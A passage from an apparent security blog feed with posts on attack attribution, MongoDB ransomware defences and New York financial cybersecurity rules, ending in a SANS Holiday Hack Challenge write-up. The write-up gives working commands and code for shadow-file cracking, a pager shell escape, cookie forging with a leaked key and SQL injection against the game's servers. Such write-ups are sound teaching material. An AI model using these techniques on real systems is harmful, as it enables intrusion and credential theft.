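actor_abc = {"sender:fedex-note@mail.example", "useragent:outlook16",
             "compile-tz:+0300", "compiler:msvc10", "c2:update.example.net"}

# Indicators pulled from a new incident
incident = {"sender:fedex-note@mail.example", "useragent:outlook16",
            "compile-tz:+0300", "compiler:msvc10", "c2:cdn.example.org"}

score = match_percentage(actor_abc, incident)
print(score)  # 80.0 - in the 70-80% band: likely the same repeat customer
```

A real pipeline would also weight indicators by rarity rather than counting them equally, since a shared free email provider says far less than a reused command-and-control domain.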

And here’s the important part: if they’re lying convincingly to the front line analyst handling incident response, it doesn’t matter. At one of my previous employers, there was a saying (picked up from the military): left of boom. You put all the indicators for an actor on a timeline, and you can see there’s a “boom” point in the middle where the victim system is compromised. The place where you wanted to detect the adversary was always left of boom.

But if boom happens, you can better plan your incident response. With proper attribution, you know what is likely to happen next and can act accordingly, thwarting the adversary’s efforts. Even if an adversary is pretending to be a completely different adversary, the prediction of what happens right of boom stays the same.

To further complicate things, I’m speaking in broad strokes meant to evoke more than depict, as each attacker and attack is still to some degree unique, but hopefully you get the idea. A defender who’s tracking indicators on a large scale will see patterns emerge that can be acted upon — even in the middle of an active incident.

So What Does This Mean?

Knowing who your adversary is can be very helpful if your company is attacked, and certainly beneficial to planning defensive strategies. But in the big picture, knowing the nationality of your attacker means nothing.

Attribution as it is used in the incident response world refers to the process described above. Dealing with the nation state bankrolling the attacker organization, however, is handled by politicians, and most front line people care very little about it. Knowing the attacker is Russian- or Chinese-sponsored means nothing when you’re trying to locate every instance of a crafted backdoor on a few dozen infiltrated machines, but knowing what the attacker might do next is vital.

One More Thing

Oh yes, there’s one other category of indicators: the classified kind. Sure, you have your pile of nice indicators that allow you to differentiate Attacker ABC from Attacker XYZ, but the U.S. government does a lot of spy stuff — real spy stuff — and that data is what truly puts a face on Attacker ABC.

When a security company does attribution and links an incident to Fancy Public APT Name, they aren’t releasing the hundreds of thousands of indicators from the closely guarded database they used to statistically prove that the incident aligns more than 80% with other indicators from said group; they release a few dozen. There are enough oddball indicators out there to lead you to believe a particular nation state was involved, but often, via nudge nudge wink wink, these organizations find out from the U.S. government that yes, Fancy Public APT Name is backed by a specific foreign government.

Conclusions

Basic attribution is easy. Well, if you have that big fat searchable database of indicators you’ve been collecting, it’s easy. It can take minutes, and then you know what adversary you’re dealing with and can plan next steps. In fact, if it takes more than a few minutes to determine who the adversary is, it might not be worth the effort. Entire companies are devoted to building products that apply AI (or at least make data analysis easier than sifting through indicators) to tell what might happen next, getting that process down from minutes to seconds or even milliseconds.

The fact that a government waits weeks before announcing “it was China” or “it was Russia” is either spy-level fact checking or political maneuvering (or both!), and it’s not easy. Don’t confuse this with basic attribution. A lot of people within the infosec community dismiss entire reports simply because they’re looking at a few dozen easily-faked indicators and a “Russia did it” label. You can debate the validity of those few dozen indicators, but realize there may be a few hundred more that have been withheld for “proprietary reasons” by the security boutique that released what is, at least in part, an advertising and PR report.

So the next time you see these headlines in the press and in reports from security companies, keep some of this in mind. There’s a lot going on behind the scenes.

]]>
<![CDATA[Why the MongoDB Ransomware Shouldn't Surprise Anyone]]> https://duo.com/blog/why-the-mongodb-ransomware-shouldnt-surprise-anyone https://duo.com/blog/why-the-mongodb-ransomware-shouldnt-surprise-anyone Mon, 16 Jan 2017 00:00:00 -0500

Recent reports have revealed MongoDB instances being targeted with ransomware. At the time of this writing, estimates suggest that there have been over 28,000 unique cases of ransomware from multiple actors targeting hosts running MongoDB.

MongoDB, like many other NoSQL database solutions, has a track record of shipping with insecure default configuration settings, including listening on all interfaces and providing read/write access without authentication. These insecure defaults, as well as simple misconfigurations on the part of administrators, expose hosts to information theft.

This post aims to provide a bit of background on exposed MongoDB instances, as well as give some helpful tips and resources on securing a MongoDB deployment.

This Shouldn’t Be a Surprise

Exposed MongoDB instances have been discussed by researchers for years. Throughout 2015, researcher Chris Vickery discovered multiple accessible MongoDB instances, exposing hundreds of millions of records containing potentially sensitive information.

Shodan, a search engine for Internet-connected devices, has reported on exposed MongoDB databases multiple times, measuring over 680 TB of data exposed by open MongoDB instances.

Researchers at BinaryEdge did a similar study on the exposure of different storage solutions and found that hundreds of MongoDB instances had a database created with the name DELETED_BECAUSE_YOU_DIDNT_PASSWORD_PROTECT_YOUR_MONGODB, which is similar to the attacks we’re seeing now. A follow-up study showed that the number of open MongoDB instances only increased over time.

Even the case of ransomware targeting storage services isn’t new. Last year, we discovered that actors were targeting Redis with fake ransomware. In the case of the Redis attacks, attackers were simply deleting the data and asking for a ransom. This appears to be the same scenario as at least some of the MongoDB attacks, with victims paying the ransom and reporting that they did not receive a copy of their data.

Nearly every instance of compromised MongoDB databases could be prevented by employing standard security best practices.

How to Protect MongoDB

The team behind MongoDB responded to the ransomware attacks in a blog post that directs readers to the MongoDB security manual as well as a security checklist that can be used to make sure a deployment is using best practices.

At a high level, we recommend using these simple controls to help create a baseline of MongoDB security:

Limit Network Exposure

The easiest way to prevent attackers from compromising a MongoDB instance is to limit their ability to connect at the network layer. The MongoDB configuration file specifies a net.bindIp entry which can be used to force MongoDB to bind to localhost. It should be noted that, as of version 2.6, MongoDB ships in many distributions with this already set to localhost instead of binding to all interfaces.
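For reference, this is roughly what the relevant section of the YAML-format configuration file looks like; net.bindIp is the documented option, while the file path and surrounding settings vary by installation:

```yaml
# /etc/mongod.conf (path varies by distribution)
net:
  bindIp: 127.0.0.1   # accept connections on the loopback interface only
  port: 27017
```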

If you need to allow access to a MongoDB instance from another host, we recommend using firewall rules to allow access from only authorized hosts.

Configure Role-Based Access Control

MongoDB supports role-based access control (RBAC) which allows for the creation of multiple users with different levels of access. We recommend configuring user accounts with the least privileges required as well as ensuring that strong passwords are used for authentication.

Perform Regular Backups

Any critical data should be regularly backed up and stored in case the original copy is somehow lost. MongoDB provides the mongodump and mongorestore utilities to easily backup and restore database contents.

Check out MongoDB’s security checklist for the full list of security recommendations.

Moving Forward

At the time of writing, Shodan estimates that there are over 47k MongoDB hosts exposed to the Internet, indicating that the number of hosts targeted by ransomware may continue to climb.

While these latest attacks may prompt MongoDB administrators to lock down their deployments, this likely won’t be the last time we see ransomware target data storage solutions.

Back in October, we performed research into the exposure of different NoSQL databases and key/value stores. During the research, we found a substantial number of hosts using different technologies such as Memcached, MongoDB, Redis, and Elasticsearch.

Exposed Key/Value and NoSQL Databases

Since these hosts store critical (and often sensitive) information and are accessible to anyone without authentication, and since vulnerabilities (such as these for Memcached) continue to be released, it is likely that ransomware will continue to target these technologies until action is taken to secure them.

Using best security practices for these technologies significantly reduces the attack surface and helps protect your data from attackers.

For more information including a more complete list of information leaks resulting from open MongoDB instances, you can find the full slides from our talk here.

]]>
<![CDATA[New Cybersecurity Regulation for NY Financial Services]]> https://duo.com/blog/new-cybersecurity-regulation-for-ny-financial-services https://duo.com/blog/new-cybersecurity-regulation-for-ny-financial-services Wed, 11 Jan 2017 09:00:00 -0500

The New York State Dept. of Financial Services (DFS) has released a revised draft of its proposed cybersecurity regulation for banks, insurance companies and other financial services, Cybersecurity Requirements for Financial Services Companies (PDF).

The updated regulation requires organizations to develop a cybersecurity program and written policy to protect the integrity and privacy of confidential data.

The DFS also pushed back the implementation deadline from the original date of Jan. 1, 2017 to March 1, 2017. Organizations must meet compliance requirements within 180 days of the regulation’s effective date.

The new regulation also requires organizations to notify the DFS within 72 hours of determining that a security incident has occurred.

Authentication

The DFS requires organizations to use multi-factor authentication or risk-based authentication to protect against unauthorized access to nonpublic information systems.

Multi-factor authentication (MFA), also known as two-factor authentication, can protect against phishing and other password exploitation attacks by verifying a user’s identity via another factor - such as the approval of a push notification sent via a mobile app. Learn more about two-factor authentication.

Risk-based authentication is when an authentication system takes into account the profile of the device/user requesting access. If the risk is high, the authentication process becomes more restrictive.
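To make that concrete, here is a toy sketch of a risk-based login decision; the signal names, weights, and thresholds are all invented for illustration and come from neither the DFS regulation nor any real product:

```python
# Toy sketch of risk-based authentication. All signals, weights, and
# thresholds below are invented for illustration.
RISK_WEIGHTS = {
    "unrecognized_device": 40,
    "unusual_location": 30,
    "outdated_os": 20,
    "off_hours_login": 10,
}

def risk_score(signals):
    """Sum the weights of whichever risk signals fired for this login."""
    return sum(RISK_WEIGHTS.get(name, 0) for name in signals)

def auth_requirement(score):
    """Higher risk makes the authentication process more restrictive."""
    if score >= 60:
        return "deny"
    if score >= 30:
        return "require_second_factor"
    return "password_only"

print(auth_requirement(risk_score({"off_hours_login"})))      # password_only
print(auth_requirement(risk_score({"unrecognized_device"})))  # require_second_factor
print(auth_requirement(risk_score({"unrecognized_device",
                                   "unusual_location"})))     # deny
```

The key design point is simply that the same credentials can yield different outcomes depending on the context of the request, which is what distinguishes risk-based authentication from a static policy.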

The DFS also requires MFA for any user accessing the organization’s internal networks from an external network, “unless the Covered Entity’s CISO has approved in writing the use of reasonably equivalent or more secure access controls.”

Penetration Testing and Vulnerability Assessments

The DFS requires that each organization include continuous monitoring and periodic testing in its cybersecurity program. That includes bi-annual vulnerability assessments, including systematic scans or reviews of information systems to identify known vulnerabilities.

A different way you can protect against known vulnerabilities is to implement a security tool to detect, notify and block users logging into your systems with out-of-date and risky mobile phones, laptops, tablets, etc. to ensure only trusted devices are granted access to your applications.

Access Privileges

Organizations must also limit and periodically review user access privileges to information systems that provide access to nonpublic information.

Generally, the rule of least privilege is a good standard security best practice to follow, which dictates limiting user access to only the applications they need to do their job.

One way to do so is by implementing custom application access policies and user access policies to limit the scope of risk should the user credentials of one employee get compromised.

Third-Party Service Provider Security

The DFS also requires financial organizations to maintain a security policy to ensure that information systems that are accessible or managed by third-party service providers are also properly secured.

That includes an inventory list of providers, risk assessments, minimum cybersecurity practices, periodic assessments, policies and procedures and more.

Financial organizations also need to ensure that third parties use access controls, including multi-factor authentication to limit access to sensitive systems and confidential information.

The updated proposed regulation will be finalized after a 30-day public comment period, according to the DFS.

]]>
<![CDATA[SANS Holiday Hack Challenge Write-Up]]> https://duo.com/blog/sans-holiday-hack-challenge-write-up https://duo.com/blog/sans-holiday-hack-challenge-write-up Mon, 09 Jan 2017 00:00:00 -0500

Every year during the holiday season, SANS publishes their annual Holiday Hack Challenge. These challenges are a great way to learn new and useful exploitation techniques to solve fun puzzles.

I always enjoy participating in the Holiday Hack Challenges, and have written about my solutions in the past. The challenges have been very polished, and this year is no exception.

I first want to extend thanks to Ed Skoudis and the SANS team for always putting together a polished, fun challenge that never fails to teach something new.

This year’s contest consisted of 5 parts, each with their own challenges. I’ve split up my write-up according to those parts.

Part 1: A Most Curious Business Card

In the story for this challenge, Santa has been abducted and we need to rescue him. His business card is the only clue we have:

Santa Claus Business Card

Analyzing Santa’s Tweets

The first question asks us to find the secret message in Santa’s tweets. Looking at the Twitter profile from the business card, we find tweets that appear to contain random words:

Santa Claus Tweets

I wrote this Python script to download and store all the tweets from the Twitter feed to get a better understanding of what the tweets might mean:

import tweepy

# Twitter API credentials (fill in your own)
consumer_key = ''
consumer_secret = ''
access_token = ''
access_token_secret = ''

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)

api = tweepy.API(auth)

# Walk the timeline with a cursor and print up to 400 tweets
for status in tweepy.Cursor(
        api.user_timeline, id="santawclaus").items(400):
    print(status.text)

After the script runs, we are left with a list of tweets. Looking at the tweets in a text editor reveals the secret message “BUG BOUNTY” in ASCII art.

Finding the ZIP File

The next question asks us to determine “what is inside the ZIP file distributed by Santa’s team”. Not having a ZIP file on hand, I investigated the Instagram account referenced on Santa’s business card.

This account contains a picture of a messy desk. Zooming into the picture gave the following clues:

1) An nmap report for www.northpolewonderland.com

Nmap Report

2) A screenshot containing the filename “SantaGram_v4.2.zip”

SantaGram Screenshot

Visiting www.northpolewonderland.com shows a copy of the business card. However, requesting www.northpolewonderland.com/SantaGram_v4.2.zip downloads a copy of a password protected .zip file.

The password to the .zip file is “bugbounty” - the secret message encoded in Santa’s tweets:

$ unzip SantaGram_v4.2.zip
Archive:  SantaGram_v4.2.zip
[SantaGram_v4.2.zip] SantaGram_4.2.apk password:
  inflating: SantaGram_4.2.apk

This extracts an APK file for the social networking SantaGram application.

Part 2: Analyzing the APK

APK files are used to distribute Android applications. These are just .zip files containing the resources and code that make up the application.

It is possible to decompile the APK file into human readable source code, making analysis of the application much easier.

The first step is to use a tool called apktool to decode the contents of the APK. This extracts any resources and metadata into XML files. In addition to this, apktool disassembles the application into an intermediate “smali” representation.

We can decompile the application with apktool like this:

$ apktool d SantaGram_4.2.apk
I: Using Apktool 2.2.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

The smali representation can be difficult to read. We can use tools like dex2jar and jd-gui to turn the APK into much more readable Java source code.

We’re asked what username and password are buried in the APK. We can run a simple grep -R "password" . to find files that reference a password. This points us to two files: b.java and SplashScreen.java:

$ grep -R "password" .
./b.java:            jsonobject.put("password", "busyreindeer78");
<snip>
./SplashScreen.java:            jsonobject.put("password", "busyreindeer78");

Opening up these files in a text editor reveals the credentials “guest:busyreindeer78”:

jsonobject.put("username", "guest");
jsonobject.put("password", "busyreindeer78");

These credentials are used to post JSON analytics data to a URL, but we’ll focus on exploiting that service later.

Next, we’re asked to find the name of an audio file in the APK. Doing a simple find through our resources reveals the name of an MP3 file:

$ find . -name "*.mp3" -exec ls {} \;
./src/com/northpolewonderland/santagram/debug-20161224235959-0.mp3

We’ll come back to the APK later, but first we have to analyze another system - the “Cranberry Pi”.

Cracking the Cranberry Pi

There are password protected doors in the game that lead to more clues about Santa’s location. The passwords for these doors are found by exploiting terminals located next to each door. To interact with the terminals, we need to search the game map for pieces of the “Cranberry Pi”, a Raspberry Pi with a specialized Linux distribution loaded onto it.

Since this write-up is about the technical aspects of the challenge, we’ll skip the discussion on collecting the pieces. After we’ve collected all the pieces, we are given a link to download a “Cranbian” image at http://northpolewonderland.com/cranbian.img.zip.

This .zip file contains an image of a Cranberry Pi. We can mount this filesystem using the same technique outlined in this SANS blog post.

$ fdisk -l cranbian-jessie.img
Disk cranbian-jessie.img: 1.3 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1

Device               Boot  Start     End Sectors  Size Id Type
cranbian-jessie.img1        8192  137215  129024   63M  c W95 FAT32 (LBA)
cranbian-jessie.img2      137216 2713599 2576384  1.2G 83 Linux

$ mount -v -o offset=$((512*137216)) -t ext4 cranbian-jessie.img /mnt/sans/

Mounting the filesystem gives this file tree.

We’re asked to find the password for the “cranpi” user. We can crack the password using the popular rockyou.txt wordlist like this:

$ unshadow /mnt/sans/etc/passwd /mnt/sans/etc/shadow > sans_passwd
$ john --wordlist=rockyou.txt sans_passwd

This reveals the password “yummycookies”, which allows us to access the terminals.

Part 3: Attacking the Terminals

Terminal 1: PCAP Extraction

The first terminal we encounter tells us the passphrase is located inside the file /out.pcap.

Out Passphrase

The file /out.pcap is owned by the itchy user, and we’re logged in as scratchy.

-r--------   1 itchy itchy 1.1M Dec  2 15:05 out.pcap

Fortunately, our sudoer permissions come in handy:

scratchy@718dd6fdd7d2:~$ sudo -l
sudo: unable to resolve host 718dd6fdd7d2
Matching Defaults entries for scratchy on 718dd6fdd7d2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 718dd6fdd7d2:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings

This tells us that we can run /usr/sbin/tcpdump and /usr/bin/strings as the itchy user by doing something like:

sudo -u itchy /usr/sbin/tcpdump -r /out.pcap

We’re told the passphrase comes in two parts. Dumping the pcap as ASCII (-A), I found this HTTP request:

GET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept: */*
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.12+
Content-type: text/html
Content-Length: 113
Last-Modified: Fri, 02 Dec 2016 11:25:35 GMT
<html>
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>

So the first part is “santasli”.

Admittedly, I had quite a bit of trouble with the second half. I could tell there was an HTTP request for /secondhalf.bin which returned what appeared to be a random blob of data.

After trying different pcap carving techniques with no luck, someone recommended not overthinking the challenge and instead reading the man pages thoroughly.

The man page for the strings command shows that there are flags for different character encodings. Trying the flag for 16-bit little-endian encoding revealed the second half of the passphrase:

$ sudo -u itchy /usr/bin/strings -e l /out.pcap
part2:ttlehelper
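As a sanity check on what strings -e l is doing, UTF-16LE string extraction can be sketched in a few lines of Python (the blob below is illustrative, not the real pcap contents):

```python
import re

def strings_utf16le(data: bytes, min_len: int = 4):
    """Mimic `strings -e l`: find runs of printable ASCII characters
    stored as 16-bit little-endian units (each char followed by a NUL)."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]

# Illustrative blob -- not the actual /out.pcap contents.
blob = b"\x00garbage\xff" + "part2:ttlehelper".encode("utf-16-le") + b"\x01"
print(strings_utf16le(blob))  # ['part2:ttlehelper']
```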

Terminal 2: The Wumpus

Our second terminal tells us the passphrase is given after we beat “the wumpus”:

The Wumpus

There’s an x64 binary in our home directory called wumpus. Executing it starts a game. We can either play the game or cheat.

Cheating it is.

I first wanted a local copy of the binary for debugging. I used base64 to encode the binary and then copy/pasted the contents into my own terminal. I could then decode the content to get a clone of the original binary.
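The transfer is just a base64 round trip; a sketch of the idea with stand-in bytes (the actual encoding on the terminal side would be done with the base64 utility):

```python
import base64

# Stand-in for the wumpus binary's bytes.
binary = bytes(range(256))

# Terminal side: encode to printable text that survives copy/paste.
encoded = base64.b64encode(binary).decode("ascii")

# Local side: decode the pasted text back into an identical binary.
decoded = base64.b64decode(encoded)
assert decoded == binary
```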

Disassembling the game in gdb shows these functions:

(gdb) info functions
All defined functions:

Non-debugging symbols:
<snip>
0x0000000000400d26  main
0x000000000040111e  display_room_stats
0x00000000004012a8  take_action
0x0000000000401383  move_to
0x0000000000401740  shoot
0x0000000000401af3  gcd
0x0000000000401b27  cave_init
0x0000000000401eae  to_upper
0x0000000000401f1a  clear_things_in_cave
0x0000000000401fb3  initialize_things_in_cave
0x00000000004021a4  getans
0x0000000000402238  bats_nearby
0x00000000004022b6  pit_nearby
0x0000000000402334  wump_nearby
0x000000000040241c  move_wump
0x0000000000402476  int_compare
---Type <return> to continue, or q <return> to quit---
0x00000000004024a0  instructions
0x0000000000402607  usage
0x0000000000402633  wump_kill
0x0000000000402644  kill_wump
0x0000000000402866  no_arrows
0x0000000000402877  shoot_self
0x0000000000402888  jump
0x00000000004028aa  pit_kill
0x00000000004028bb  pit_survive
0x00000000004028d0  __libc_csu_init
0x0000000000402940  __libc_csu_fini
0x0000000000402944  _fini

The function kill_wump immediately sticks out. Starting the program and using gdb to jump to the address of the kill_wump function beats the game and gives the passphrase.

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/wumpus
Instructions? (y-n) ^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b0cba0 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:81
81  ../sysdeps/unix/syscall-template.S: No such file or directory.

(gdb) jump *0x0000000000402644
Continuing at 0x402644.
*thwock!* *groan* *crash*

A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game!  You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!

Passphrase:
WUMPUS IS MISUNDERSTOOD

Terminal 3: Hidden Directories

The next terminal asked us to find the passphrase file buried in directories:

Directories

I first used the command ls -alR to recursively list the contents of each directory. This showed that there was a file, key_for_the_door.txt, which was hidden under multiple directories named with special characters designed to make it difficult to traverse.

Instead of manually trying to traverse the directories, I solved the challenge using find:

elf@4978b123e95c:~$ find . -name key_for_the_door.txt -exec cat {} \;
key: open_sesame

That key opened the door, which led to a room with a WarGames emulator. Using dialog taken from YouTube clips and other references, we can get all the way to launching a strike, which gives a key: LOOK AT THE PRETTY LIGHTS

Terminal 4: Train Station

This terminal at the train station presented a train management interface:

Train Management Interface

Running the HELP command displays a help file containing a hint mentioning the use of “less”.

menu:main> HELP
**HELP** brings you to this file.  If it's not here, this console cannot do it, unLESS you know something I don't.

This article gives helpful tips on how to escape pagers like less and more. Since this help file is itself displayed with less, we can use the simple shell escape !/bin/sh to drop into a shell.

In the shell, we can run the “ActivateTrain” script and see an animation that takes us back in time to 1978.

sh-4.3$ ls
ActivateTrain  TrainHelper.txt  Train_Console
sh-4.3$ ./ActivateTrain

Activate Train

After we travel back in time, we find Santa in the same room that was protected by the Wumpus terminal.

Santa Captured

It’s great that we found Santa, but we still don’t know who captured him in the first place. For the last part of the challenge, we’ll exploit multiple North Pole services to collect clues and discover who captured Santa.

Part 4: The North Pole Bug Bounty

We found the first MP3 file in the APK we analyzed in Part 2. This APK also contains a resource file that discloses the following URLs:

https://analytics.northpolewonderland.com/report.php?type=launch : 104.198.252.157
https://analytics.northpolewonderland.com/report.php?type=usage : 104.198.252.157
http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5 : 104.198.221.240
http://dev.northpolewonderland.com/index.php : 35.184.63.245
http://dungeon.northpolewonderland.com/ : 35.184.47.139
http://ex.northpolewonderland.com/exception.php : 104.154.196.33

After confirming with the game’s “oracle” that each of these IP addresses is in scope, we can start hacking.

Mobile Analytics Server

Credentialed Access

Hitting the main URL https://analytics.northpolewonderland.com takes us to a login page. We can log in with the credentials we pulled from the APK in Part 2 (guest:busyreindeer78) to get access:

Sprusage Login Query Page

Clicking the “MP3” link downloads the second audio file.

After some testing, I decided to go back to square one and nmap the host. I recalled a hint from one of the elves about looking for hidden files, so I ran nmap with the --script http-enum option to check for common files and folders.

This gave the following output:

PORT    STATE SERVICE
22/tcp  open  ssh
443/tcp open  https
| http-enum:
|   /login.php: Possible admin folder
|_  /.git/HEAD: Git folder

Leaving a Git repository exposed is a classic mistake. We can use the steps outlined here to clone the repo.

Downloading the contents of the folder and running git status shows tracked files that have been deleted from the working tree:

root@sans:~/sans/analytics# git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git checkout -- <file>..." to discard changes in working directory)

    deleted:    README.md
    deleted:    crypto.php
      <snip>
    deleted:    db.php
    deleted:    edit.php
    <snip>
    deleted:    login.php
    deleted:    logout.php
    deleted:    mp3.php
    deleted:    query.php
    deleted:    report.php
    deleted:    sprusage.sql
    deleted:    test/Gemfile
    deleted:    test/Gemfile.lock
    deleted:    test/test_client.rb
    deleted:    this_is_html.php
    deleted:    this_is_json.php
    deleted:    uuid.php
    deleted:    view.php

Resetting our current working directory restores the files:

root@sans:~/sans/analytics# git checkout -- .
root@sans:~/sans/analytics# ls
crypto.php  db.php    fonts       getaudio.php  index.php  login.php   mp3.php    README.md   sprusage.sql  this_is_html.php  uuid.php
css         edit.php  footer.php  header.php    js         logout.php  query.php  report.php  test          this_is_json.php  view.php

The contents of the PHP files show a web app that lets users create and save reports.

Access control in the application is done through a function called restrict_page_to_users. This function checks to make sure a username was provided and, if so, calls the function check_access to make sure the username is allowed to visit the page.

Here’s the check_access function:

  function check_access($db, $username, $users) {
    # Allow administrator to access any page
    if($username == 'administrator') {
      return;
    }

    if(!in_array($username, $users)) {
      reply(403, 'Access denied!');
      exit(1);
    }
  }

So, if we can somehow log in as the administrator user, we’ll have access to every page.

Remember: Our goal is to get the MP3 files for later steps, which is why we want admin access.

Admin Access #1: Forging Cookies

Logging in to the web application is handled the usual way - send a username/password, it’s checked against the database and, if all looks good, a session cookie is set. The SQL access looks fine, so we need to break the cookie generation.

The session cookie is created as follows (from login.php):

    $auth = encrypt(json_encode([
      'username' => $_POST['username'],
      'date' => date(DateTime::ISO8601),
    ]));

    setcookie('AUTH', bin2hex($auth));

This creates a cookie using a custom encrypt routine in crypto.php. The encrypt function uses PHP’s mcrypt implementation to encrypt the username and current date. However, the encryption key is left in the code.

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");  

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

This means that we can craft cookies of our own that will be accepted by the web application. Here’s some sample code:

<?php

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}
echo bin2hex(encrypt(json_encode([
   'username' => "administrator",
   'date' => date(DateTime::ISO8601),
])));
?>
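Since MCRYPT_ARCFOUR is plain RC4, the same cookie can also be forged without PHP; a sketch in Python with RC4 implemented inline (the compact separators mirror PHP's json_encode output, and the hardcoded UTC offset is an assumption about the server's timezone):

```python
import json
from datetime import datetime

def rc4(key: bytes, data: bytes) -> bytes:
    """Pure-Python RC4 -- the cipher behind PHP's MCRYPT_ARCFOUR."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# The key leaked in crypto.php
KEY = bytes.fromhex("6117a495bf3dd7cd2e0d8bcb9f79e1dc")

payload = json.dumps(
    {"username": "administrator",
     # DateTime::ISO8601-shaped date; the -0500 offset is assumed
     "date": datetime.now().strftime("%Y-%m-%dT%H:%M:%S-0500")},
    separators=(",", ":"))                    # match PHP's compact json_encode
print(rc4(KEY, payload.encode()).hex())       # value for the AUTH cookie
```

Because RC4 is symmetric, the same function also decrypts a captured AUTH cookie, which is a quick way to verify the leaked key is correct.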

After generating our cookie, we can use a cookie manager extension to add the cookie value.

Add Cookie Value

Refreshing the page results in admin access to the application.

Admin Access #2: Storing Credentials in Git

Accidentally committing credentials into a Git repo is harmful because it can be difficult to remove them.

Looking through the output of git log, we see commit d9636a3d648e617fcb92055dea63ac2469f67c84 which claims to give “small authentication fixes”. Comparing that commit with the commit before it reveals administrative credentials:

root@sans:~/sans/analytics/# git diff d9636a3d648e617fcb92055dea63ac2469f67c84 d9636a3d648e617fcb92055dea63ac2469f67c84^
diff --git a/sprusage.sql b/sprusage.sql
index cb262e4..c7254f8 100644
--- a/sprusage.sql
+++ b/sprusage.sql
@@ -37,7 +37,6 @@ CREATE TABLE `reports` (

 <snip>
+INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
<snip>

--- Dump completed on 2016-11-13 19:20:20
+-- Dump completed on 2016-11-13 19:17:27
diff --git a/test/test_client.rb b/test/test_client.rb
index 847cf97..ac67d4f 100644
--- a/test/test_client.rb
+++ b/test/test_client.rb
<snip>
-    :username => ARGV[0],
-    :password => ARGV[1],
+    :username => 'administrator',
+    :password => 'KeepWatchingTheSkies',
<snip>

Trying the credentials “administrator:KeepWatchingTheSkies” logs us in as admin.

Mobile Analytics Server - Post Authentication

There’s only one page that doesn’t allow access from the guest user: edit.php.

  # Don't allow anybody to access this page (yet!)
  restrict_page_to_users($db, []);

This page claims to not let anyone access it, but remember that check_access always allows access from the administrator.

This page lets us edit the attributes of a saved query. At first glance there were no immediate vulnerabilities, since we could seemingly only update the name, id, or description:

Edit Attributes of Saved Query

However, let’s take a step back and see how queries are stored. In our schema, reports are structured like this:

CREATE TABLE `reports` (
  `id` varchar(36) NOT NULL,
  `name` varchar(64) NOT NULL,
  `description` text,
  `query` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Wait - what’s “query”? That’s the SQL query that’s actually run when we view our report. We can verify that in query.php:

$result = mysqli_query($db, "INSERT INTO `reports`
    (`id`, `name`, `description`, `query`)
    VALUES
    ('$id', '$name', '$description', '" . mysqli_real_escape_string($db, $query) . "')
");

Looking back at edit.php, we see that the code checks every attribute to see if we set it as a parameter in our request. If it’s set by us, it’s updated:

$set = [];
foreach($row as $name => $value) {
    print "Checking for " . htmlentities($name) . "...<br>";
    if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
    }
}

This includes the report’s query field.

This means that we can create a report, grab the ID, and use the edit.php script to set the report query to an arbitrary SQL query which is then run when we view the report. By using backticks, we can bypass the call to mysqli_real_escape_string.

For example, this sets the query to dump out all the MP3 file information:

https://analytics.northpolewonderland.com/edit.php?id=a30d8ed5-b0d4-4969-b6d8-c4c241f1fc49&query=SELECT%20*%20FROM%20`audio`
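Hand-encoding the injected query into a URL is error-prone; a small sketch that builds the same request URL (the id is our saved report's id from above):

```python
from urllib.parse import urlencode

base = "https://analytics.northpolewonderland.com/edit.php"
params = {
    "id": "a30d8ed5-b0d4-4969-b6d8-c4c241f1fc49",  # our saved report's id
    "query": "SELECT * FROM `audio`",              # SQL to plant in the report
}
# urlencode handles the backticks, spaces, and asterisk for us.
print(base + "?" + urlencode(params))
```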

Viewing that report shows the results:

Query UUID

